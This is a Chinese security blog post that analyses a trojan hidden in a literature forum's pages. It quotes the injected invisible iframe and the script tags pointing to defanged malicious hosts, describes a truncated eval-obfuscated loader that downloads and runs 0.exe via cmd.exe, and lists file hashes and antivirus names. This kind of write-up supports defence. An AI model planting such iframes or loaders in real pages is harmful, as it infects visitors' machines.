首页 > 其他分享 >文学论坛挂的马变为 Worm.Win32.QQPass.a / 0.exe

文学论坛挂的马变为 Worm.Win32.QQPass.a / 0.exe

时间:2022-11-23 17:02:52浏览次数:45  
标签:--- www exe hxxp 31 Worm js Win32 com


文学论坛挂的马变为 Worm.Win32.QQPass.a / 0.exe

endurer 原创
2007-08-31 第1

检查发现网页中包含代码:
/---
<iframe src="hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907" width="0" height="0" frameborder="0"></iframe>
---/

hxxp://www.y*oyo*5*9***.com/m**6*8.htm?id=907 包含代码:
/---
<script src=hxxp://www.y*oyo*5*9***.com/00.js></script>
1
2
3
<script src=hxxp://www.y*oyo*5*9***.com/11.js></script>
---/

00.js 内容为:
/---
eval("/146/165…(略)…/40/175")
---/

解密后的代码功能为 下载 hxxp://www.*down*8**9.com/0.exe,保存到 %windir%,文件名由自定义函数:
/---
function gn(tnV1) { var kUzRo2 = window["Math"]["random"]()*tnV1; return '.tmp'+'~tmp'; }
---/
生成,即~tmp.tmp,然后用 cmd.exe /c 来运行。

文件说明符 : d:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-8-31 19:3:13
修改时间 : 2007-8-31 19:3:22
访问时间 : 2007-8-31 0:0:0
大小 : 16944 字节 16.560 KB
MD5 : ceb6f4d04c9f5ff2f6636dd7233460d9
HSA1: 9F48898ECA47463712D65752C4AF0C072F200C8F

Kaspersky 报为 Worm.Win32.QQPass.a,瑞星 报为 Trojan.PSW.Win32.Agent.vcd

11.js 没有什么可疑的东东。 

标签:---,www,exe,hxxp,31,Worm,js,Win32,com
From: https://blog.51cto.com/endurer/5881507

相关文章

  • 遭遇一堆 Trojan.PSW.Win32.OnlineGames / *door0.dll等3
    遭遇一堆Trojan.PSW.Win32.OnlineGames/*door0.dll等3endurer原创2007-08-30第1版再贴一下部分恶意程序文件的信息。仅就报的病毒名来看,Kaspersky还挺牛的。文件说明......
  • 遭遇一堆 Trojan.PSW.Win32.OnlineGames / *door0.dll等2
    遭遇一堆Trojan.PSW.Win32.OnlineGames/*door0.dll等2endurer原创2007-08-29第1版发一下Dr.WebCureIt!扫描的日志。BTW,Dr.WebCureIt!现在集成了简体中文语言包,运......
  • 遭遇一堆 Trojan.PSW.Win32.OnlineGames / *door0.dll等1
     遭遇一堆Trojan.PSW.Win32.OnlineGames/*door0.dll等1endurer原创2007-08-27第1版一位网友说他的电脑最近开机时金山毒霸出错,运行很慢,让偶通过QQ远程协助帮忙检查......
  • 小心传播Trojan-GameThief.Win32.OnLineGames.smoh的电子邮件
    小心传播Trojan-GameThief.Win32.OnLineGames.smoh的电子邮件 endurer原创2008-08-01第1版 邮件主题:拜托大家罗附件:~拜托大家罗~.arj 文件说明符:E:/test/~拜托大......
  • 遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames
    遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQPass,Trojan-PSW.Win32.OnLineGames等2endurer原创2008-03-20第1版(结:遭遇RootKit.Win32.GameHack,Trojan.PSW.Win32.QQP......
  • win32开发(定时器)
      要说除了鼠标、键盘消息之外,还有什么消息最重要。我想大概是就是定时器了。这定时器可长可短,如果是短定时器的话,那么就可以形成动画,记录成视频。如果是长定时器的话,那......
  • win32开发(图形绘制)
      在win32上面绘制图形其实是比较简单的。要想进行图形绘制,关键是找到设备上下文。就我目前所知道的,获得设备上下文主要有这么几种方式:一、根据BeginPaint获得设备上下......
  • win32开发(按键消息)
      对于一个应用来说,按键和鼠标都是基本的消息。当然,win32也需要独立处理按键消息和鼠标消息。今天,我们就讨论一下按键消息。一般认为,当键盘上一个key按下去之后,os会给ap......
  • win32开发(调试)
      很多同学都喜欢看代码,但是不喜欢调试代码。其实,在我看来,调试代码本身也是一项重要的能力。一份代码,如果没有经过反复调试和验证,很难说自己是不是理解得够深刻。同样对......
  • win32开发(简单绘图)
      在win32上面,所有的操作都是通过消息来完成的。正如前面一节说的那样,WM_CREATE、WM_PAINT、WM_SIZE、WM_DESTROY、WM_CHAR等消息都是我们在开发中经常要遇到的消息内容......